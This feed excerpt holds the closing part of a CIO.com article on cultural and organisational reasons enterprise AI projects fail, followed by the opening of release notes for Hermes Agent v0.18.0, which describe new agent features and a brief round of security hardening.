<p>While every organization’s circumstances are unique, the root causes are often surprisingly familiar. Like so many technological leaps that came before AI, fear, culture and competing priorities are often the biggest barriers to enterprise success.</p>



<h2 class="wp-block-heading">1. Fear of job replacement</h2>



<p>It’s no secret that employees across industries, roles and seniority levels can see the writing on the wall: AI will affect their careers. According to <a href="https://www.pewresearch.org/social-trends/2025/02/25/u-s-workers-are-more-worried-than-hopeful-about-future-ai-use-in-the-workplace/?utm_source=chatgpt.com">Pew Research</a>, 52% of workers are concerned about AI’s future impact on the workplace, and 32% believe it will reduce job opportunities in the long run.</p>



<p>As a result, there may be resistance, or just a lack of enthusiasm, to AI initiatives. This can cause AI success to stall in the form of slow adoption, low engagement and knowledge hoarding. One <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer study</a> even found that 29% of employees (and 44% of Gen Z) admit to sabotaging their employer’s AI strategy.</p>



<p>There is a common refrain, and new <a href="https://www.gartner.com/en/newsroom/press-releases/2026-05-13-gartner-hr-research-reveals-ai-will-create-more-jobs-than-it-eliminates-beginning-in-2028" rel="nofollow">research from Gartner</a> to boot, that beginning in 2028, AI will create more jobs than it eliminates. Even so, such assurances can ring hollow to employees. The bitter pill for tech leaders to swallow is that there is little certainty that the jobs to be created will be well-paid or accessible to workers whose roles were eliminated.</p>



<p>Tech leaders are often surrounded by high performers, innovators and professionals who naturally view change as an opportunity. In these environments, it’s easy to overlook that many workers experience transformation differently—and would prefer predictability over a disruption to their routine or simply don’t have the bandwidth to pivot.</p>



<p>Take secretarial work, which was once a well-compensated role, especially for women without an advanced degree. Technology—namely computers, email, software and virtual assistants—enabled the reduction in demand for these professionals, not overnight but over the course of several decades. More than 2.1 million administrative and office support jobs have disappeared in the U.S. since 2000, according to Labor Department data. While there are many professionals who upskilled or changed careers, <a href="https://www.washingtonpost.com/business/economy/administrative-assistant-jobs-helped-propel-many-women-into-the-middle-class-now-theyre-disappearing/2019/12/04/75686efe-f6a0-11e9-a285-882a8e386a96_story.html" rel="nofollow">The Washington Post</a> reports that middle-aged and older workers have had a hard time finding work within their skill set with similar pay and benefits.</p>



<p>On the other end of the spectrum, AI is empowering many employees to lift the ceiling on their potential by expanding what we can do and who can contribute high-value work. A rising tide may lift all boats, but those who Microsoft dubs “Frontier Professionals,” who are the most advanced AI users, are most likely to benefit from new job opportunities created by AI. The <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer</a> study shows that 92% of the C-suite are actively cultivating “AI elite” employees, while 60% plan layoffs for non-adopters.</p>



<p>No leader can promise what the labor market will look like a decade from now. What they can do is provide clarity about the next six months to two years. Moreover, supporting employees with tools that help them prepare for the future is more valuable than trying to offer certainty about the future.</p>



<p>Provide a transparent roadmap for your organization’s AI implementation goals. Acknowledge the fear, but also the possibility, and help employees process the changes they are living through by providing access to information, continuing education, <a href="https://www.cio.com/article/4165040/you-cant-train-your-way-out-of-the-ai-skills-gap.html">redesigned workflows</a> and sandbox environments for AI learning and experimentation. The exact way your organization approaches the fear of job replacement will depend on the nature of your industry and its professionals. Some roles will change dramatically in a few years, while others may change slowly over decades, as secretarial roles did.</p>



<p>Ironically, despite fears of job displacement, AI workforce impact remains low, according to <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a>. The most immediate barrier to AI adoption is often the opposite: a shortage of AI skills and systems. </p>



<h2 class="wp-block-heading">2. Lack of AI-first culture</h2>



<p>Many organizations purchase AI technology without redesigning current business processes and workflows around it, which can lead to failed adoption. AI adoption is less like a software rollout and more like an organizational transformation initiative that requires “cultural openness” to a process or workflow reset.</p>



<p>Despite the anxiety around AI at work, the <a href="https://www.microsoft.com/en-us/worklab/work-trend-index/agents-human-agency-and-the-opportunity-for-every-organization" rel="nofollow">Microsoft Work Trend Index Annual Report</a> found that “In many cases, people are ready. The systems around them are not.” The research shows that 65% of AI users fear falling behind if they don’t adapt fast. Yet 45% say it feels safer to stick with current goals than to redesign work with AI—and only 13% are rewarded for reinventing how they work, even when results fall short. This demonstrates a paradox where organizational metrics, incentives and norms keep employees anchored to the past way of doing things.</p>



<p>There is no universal blueprint for an AI-first culture. What it looks like will vary by organization, industry and workforce, and it will continue to evolve as AI capabilities mature. But a common thread is prioritizing a growth mindset. As Microsoft Chief People Officer Amy Coleman and WSJ Leadership Institute President Alan Murray discussed in a recent <a href="https://www.wsj.com/video/building-an-aifirst-humancentered-culture/3AE514C2-CEF0-4A13-8ADF-9ED06E86AB84" rel="nofollow">interview</a>, “Stop being a know-it-all company and start being a learn-it-all company.” That means encouraging experimentation despite imperfect conditions, permitting employees to fail, rewarding those who succeed, and ensuring leaders model the behaviors they want to see.</p>



<p>Learning and development alone are not enough. An AI-first culture must also prioritize strong <a href="https://www.cio.com/article/4136833/its-not-your-ai-thats-failing-its-your-data.html">data foundations</a> and workflows, which may be one of the most challenging barriers to overcome. <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a> found that although 42% of companies surveyed believe their strategy is highly prepared for AI adoption, they feel less prepared in terms of infrastructure, data, risk and talent.</p>



<p>For leaders who view culture as a secondary concern, the numbers tell a different story. The Microsoft report revealed 67% of AI impact comes from culture, manager support and talent practices, which is more than double the 32% tied to individual mindset and behavior.</p>



<h2 class="wp-block-heading">3. Competing priorities and misaligned incentives</h2>



<p>One of the least discussed reasons AI projects fail is that different stakeholders are optimizing for fundamentally different definitions of success. Consider an ITSM AI initiative: the CIO is tasked with reducing technology costs, the service desk wants faster ticket resolution, builders want scalable systems and the legal department is concerned about compliance and liability. Each group may support the project in principle, but they are measuring success through entirely different lenses.</p>



<p>Without alignment on a shared business objective, teams might struggle to balance the inevitable trade-offs AI projects require. Teams optimize for their own priorities rather than a common outcome, resulting in slower decisions, competing incentives and a lack of ROI. They might also be working off of incentive structures that reward the old way of doing things. For example, if an IT team is rewarded based on tickets resolved, there is little incentive to drive down ticket volume in the first place.</p>



<p>In some organizations, the problem runs even deeper. Rather than optimizing for a business outcome, they’re optimizing for appearances. <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">75%</a> of executives acknowledge their company’s AI strategy is more performative than practical—existing primarily to signal innovation rather than to provide meaningful business results. Much like offices that touted high-end photocopiers in the 1980s that nobody knew how to use, investments in this vein can end up costing way more than they’re worth.</p>



<p>Unlike underutilized photocopiers, the stakes of failing at AI adoption are high. Though the underlying challenges are nothing new, what is new is the scale of AI’s impact and the risk of falling behind competitors that get it right. (Yes, I recognize the irony of referencing photocopier technology while writing about AI.)</p>



<h2 class="wp-block-heading">4. Excuses</h2>



<p>When explaining why AI projects stall, there are sometimes excuses:</p>



<ul class="wp-block-list">
<li>The vendor overpromised</li>



<li>We chose the wrong model</li>



<li>The technology wasn’t mature enough</li>



<li>Compliance and legal slowed us down</li>



<li>We didn’t have the right talent</li>



<li>The market changed</li>
</ul>



<p>These concerns are valid but rarely insurmountable. Nearly every successful AI program has had to navigate some combination of imperfect circumstances. It’s important to treat these challenges as hurdles, not dead ends, and find ways around them by having a growth mindset culture and bringing in expertise where needed.</p>



<p>I’ve yet to see a project fail because leaders cared too much about communication, culture, alignment or commitment over the long-term. More often, the opposite is true. AI may be one of the most significant technological shifts of our lifetime, but success still depends on fundamentals: strong leadership, adaptable culture, clear objectives and a willingness to act.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.18.0 (2026.7.1) — The Judgment Release]]></title>
<description><![CDATA[Hermes Agent v0.18.0 (v2026.7.1)
Release Date: July 1, 2026
Since v0.17.0: ~1,720 commits · 998 merged PRs · 2,215 files changed · ~251,000 insertions · ~41,000 deletions · 949 issues closed · 370+ community contributors

The Judgment Release. Over the last week and a half the team put nearly all...]]></description>
<link>https://tsecurity.de/de/3639600/downloads/hermes-agent-v0180-202671-the-judgment-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639600/downloads/hermes-agent-v0180-202671-the-judgment-release/</guid>
<pubDate>Wed, 01 Jul 2026 22:16:35 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.18.0 (v2026.7.1)</h1>
<p><strong>Release Date:</strong> July 1, 2026<br>
<strong>Since v0.17.0:</strong> ~1,720 commits · 998 merged PRs · 2,215 files changed · ~251,000 insertions · ~41,000 deletions · <strong>949 issues closed</strong> · <strong>370+ community contributors</strong></p>
<blockquote>
<p><strong>The Judgment Release.</strong> Over the last week and a half the team put nearly all of its effort into one goal: resolve <strong>every P0 and P1 issue and PR in the entire Hermes Agent repo</strong> — and as of this release, <strong>100% of them are closed.</strong> Zero open P0s. Zero open P1s. That's <strong>~700 highest-priority items</strong> cleared as part of <strong>~1,950 total issues and PRs closed</strong> this window. We intend to keep P0/P1 at zero from here on.</p>
<p>On top of that clean-sweep, v0.18.0 is about how <em>well</em> Hermes thinks and how it <em>knows when its work is actually done</em>. Mixture-of-Agents became a first-class citizen — named ensembles of models you can pick like any other model, with every reference model's reasoning shown to you and the aggregator's answer streamed live. The agent learned to verify its own work against evidence instead of vibes, <code>/goal</code> gained completion contracts, and <code>/learn</code> + <code>/journey</code> turned self-improvement into something you can see and steer. Underneath, the gateway became genuinely deployable-at-scale (scale-to-zero, drain coordination), the desktop grew first-class coding projects and a playable memory graph, and subagents can now fan out in the background.</p>
</blockquote>
<h2>🎯 The P0/P1 Clean Sweep — 100% resolved</h2>
<p>This is the release headline. For a week and a half the team hammered the priority backlog day and night, and every single P0 and P1 across the whole repo is now closed:</p>
<table>
<thead>
<tr>
<th>Priority</th>
<th>Issues closed</th>
<th>PRs merged</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>P0</strong> (critical)</td>
<td>3</td>
<td>8</td>
</tr>
<tr>
<td><strong>P1</strong> (high)</td>
<td>493</td>
<td>188</td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td><strong>496</strong></td>
<td><strong>196</strong></td>
</tr>
</tbody>
</table>
<p>That's <strong>~692 highest-priority items resolved</strong> in twelve days — and at the moment the sweep completed, the open P0/P1 count hit <strong>0 across the entire repo.</strong> The final cluster to fall was the interrupt-protected-compression sibling-fork bug (issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785584067" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/56391" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/56391/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/56391">#56391</a>) and its fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785996667" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/56416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56416/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/56416">#56416</a>), closed on an all-nighter right before this release cut.</p>
<p>Special shoutout to <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong>, who burned through the priority backlog day and night alongside the core team — the cron reliability wave, the compression-fork fix, the credential-exfil hardening, and a huge share of the P1 closures are his.</p>
<p>We're keeping P0/P1 at <strong>0</strong> from here forward. 🫡</p>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Mixture-of-Agents is now a first-class model you can pick</strong> — MoA used to be a mode you toggled; now every named MoA preset shows up as a selectable model under a <code>moa</code> provider, right alongside Claude, GPT, and Grok in every model picker (CLI, TUI, desktop, gateway). Pick "my-council" the same way you'd pick any model, and Hermes routes your prompt through that ensemble automatically. An ensemble of frontier models deliberating on your hardest questions is now one selection away, on every surface. (<a href="https://github.com/NousResearch/hermes-agent/pull/46081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46081/hovercard">#46081</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53548" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53548/hovercard">#53548</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53561/hovercard">#53561</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>See every model's reasoning, then watch the answer stream in</strong> — When a MoA ensemble runs, each reference model's full output now renders as its own labelled block — you can read what GPT-5 thought, what Claude thought, and what Grok thought, before the aggregator synthesizes them into one answer. And that final answer now streams to you live instead of appearing all at once after a long silence. This works in the CLI, the TUI, and the desktop app. You get to watch the committee deliberate, not just read the verdict. (<a href="https://github.com/NousResearch/hermes-agent/pull/53793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53793/hovercard">#53793</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53855/hovercard">#53855</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55625/hovercard">#55625</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56101/hovercard">#56101</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The agent verifies its own work — "done" means proven, not claimed</strong> — Hermes now records verification evidence for coding work and can decide it's finished by actually running your project's checks, not by asserting success. <code>/goal</code> gained <strong>completion contracts</strong>: you state what "done" looks like, and the standing-goal loop judges completion against that evidence instead of stopping when the model feels like it. There's a <code>pre_verify</code> hook for wiring in custom checks and a one-time migration that tunes the defaults sensibly. The difference between "I think I fixed it" and "the tests pass, here's proof." (<a href="https://github.com/NousResearch/hermes-agent/pull/50501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50501/hovercard">#50501</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52285/hovercard">#52285</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55413/hovercard">#55413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53552/hovercard">#53552</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong><code>/learn</code> — turn anything into a reusable skill by describing it</strong> — Run <code>/learn &lt;anything&gt;</code> and Hermes distills a reusable skill out of whatever you point it at — a directory, a URL, or just the workflow you walked it through five minutes ago. It writes the skill to the standards in your CONTRIBUTING.md automatically. The next time you need that workflow, it's already there. Teaching Hermes a new trick is now a single command, not a manual skill-authoring session. (<a href="https://github.com/NousResearch/hermes-agent/pull/51506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51506/hovercard">#51506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52372/hovercard">#52372</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong><code>/journey</code> — a playable timeline of everything Hermes has learned about you</strong> — The CLI and TUI gained <code>/journey</code>, a learning timeline that shows the memories and skills Hermes has accumulated over time — and you can edit or delete any of them right from the view. Pair it with the desktop's new <strong>memory graph</strong> (a top-down, playable radial timeline of memories and skills) and for the first time you can actually <em>see</em> what your agent knows, watch it grow, and prune what's wrong. Your agent's memory stops being a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/55555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55555/hovercard">#55555</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55859/hovercard">#55859</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55226/hovercard">#55226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Delegate a pile of work and keep going — background fan-out</strong> — <code>delegate_task</code> can now fan out multiple subagents that all run in the <strong>background</strong>: your chat is never blocked, and when every subagent finishes, their results come back as a single consolidated turn. Kick off "research these five competitors in parallel" or "audit these three modules," then carry on with something else while a small fleet works. When it's all done, you get one clean summary instead of babysitting each one. (<a href="https://github.com/NousResearch/hermes-agent/pull/49734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49734/hovercard">#49734</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>First-class coding Projects in the desktop app</strong> — The desktop app gained real, per-profile <strong>Projects</strong> — a sidebar of your codebases, a coding rail, a review pane, git worktree management, and agent-facing project tools, all backed by a proper <code>project → repo → lane</code> model. Instead of scattered chat sessions, your coding work is organized into projects the agent understands and can act on. It's the desktop turning into an actual coding cockpit. (<a href="https://github.com/NousResearch/hermes-agent/pull/49037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49037/hovercard">#49037</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54385" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54385/hovercard">#54385</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54517/hovercard">#54517</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Run Hermes at scale — scale-to-zero and drain coordination</strong> — The gateway can now go <strong>dormant when idle</strong> and quiesce cleanly before a restart, migration, or auto-update — without dropping in-flight conversations. A hosted or relay-only Hermes can scale to zero when nobody's talking to it and wake back up on demand, and disruptive lifecycle actions coordinate an external drain so nobody gets cut off mid-turn. Running Hermes for a team or as a hosted service just got a lot more production-grade. (<a href="https://github.com/NousResearch/hermes-agent/pull/52243" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52243/hovercard">#52243</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52937" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52937/hovercard">#52937</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54824/hovercard">#54824</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</p>
</li>
<li>
<p><strong>Cheaper self-improvement — smarter background review</strong> — The post-turn self-improvement fork (the one that decides whether to save a memory or skill) now routes to an auxiliary model, digests context instead of replaying the whole conversation, and adapts its cadence — so the "learn from what just happened" loop that runs after your turns costs a fraction of what it used to. You keep the self-improvement, you stop paying full main-model price for it. (<a href="https://github.com/NousResearch/hermes-agent/pull/49252" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49252/hovercard">#49252</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Compose your next prompt in your editor — <code>/prompt</code></strong> — <code>/prompt</code> opens your <code>$EDITOR</code> so you can hand-write a long, multi-line prompt in real markdown instead of fighting a one-line input box. Draft a detailed spec, a structured question, or a big paste, save, and it's queued as your next message. Small thing, huge quality-of-life win for anyone who writes Hermes more than a sentence at a time. (<a href="https://github.com/NousResearch/hermes-agent/pull/50509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50509/hovercard">#50509</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Google Vertex AI — Gemini through your GCP service account, no static key</strong> — Vertex AI is now a first-class provider for Gemini models over Vertex's OpenAI-compatible endpoint. The reason a plain custom-provider setup always died mid-session is that Vertex has no static API key — every request needs a short-lived OAuth2 access token (~1h TTL) minted from a service-account JSON or Application Default Credentials. Hermes now mints and auto-refreshes those tokens for you, so if your org runs Gemini through Google Cloud, you point Hermes at your service account and it just works — no token-pasting, no mid-session expiry. (<a href="https://github.com/NousResearch/hermes-agent/pull/56363" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56363/hovercard">#56363</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>)</p>
</li>
<li>
<p><strong>Security round</strong> — This window hardened several surfaces: MCP-config persistence attack surface locked down, cron <code>base_url</code> overrides that could exfiltrate provider credentials blocked, a non-reusable sentinel for prefix secrets in file reads, Slack app-level (<code>xapp-</code>) token redaction, a browser cloud-metadata floor enforced on every backend, and an <code>aiohttp</code> CVE floor across the lazy messaging paths. Fewer ways for a prompt-injected or misconfigured session to leak a credential. (<a href="https://github.com/NousResearch/hermes-agent/pull/50476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50476/hovercard">#50476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56196/hovercard">#56196</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54166/hovercard">#54166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56227/hovercard">#56227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52349/hovercard">#52349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56237/hovercard">#56237</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claudlos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claudlos">@claudlos</a>)</p>
</li>
</ul>
<hr>
<h2>🧠 Mixture-of-Agents (MoA)</h2>
<p>MoA graduated from a mode to a first-class part of the model system this window.</p>
<ul>
<li><strong>Presets as selectable virtual models</strong> — each named MoA preset appears as a model under provider <code>moa</code>; pick it in any model picker and Hermes routes through the ensemble (<a href="https://github.com/NousResearch/hermes-agent/pull/46081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46081/hovercard">#46081</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53561/hovercard">#53561</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53775/hovercard">#53775</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/moa</code> is now one-shot sugar</strong> — runs a single prompt through the default preset and restores your model afterward; persistent switching goes through the model picker (<a href="https://github.com/NousResearch/hermes-agent/pull/53548" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53548/hovercard">#53548</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Reference-model output shown as labelled blocks</strong> in CLI, TUI, and desktop — read each model's reasoning before the aggregator's synthesis (<a href="https://github.com/NousResearch/hermes-agent/pull/53793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53793/hovercard">#53793</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53855/hovercard">#53855</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Aggregator response streams live</strong> instead of appearing whole after a silence (<a href="https://github.com/NousResearch/hermes-agent/pull/55625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55625/hovercard">#55625</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>References see full tool state and fire on every user/tool response</strong>; advisory references end on a user turn and get a reference-role system prompt (<a href="https://github.com/NousResearch/hermes-agent/pull/54016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54016/hovercard">#54016</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54007/hovercard">#54007</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Opt-in full-turn trace persistence to JSONL</strong> (<code>moa.save_traces</code>) for debugging and eval (<a href="https://github.com/NousResearch/hermes-agent/pull/56101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56101/hovercard">#56101</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
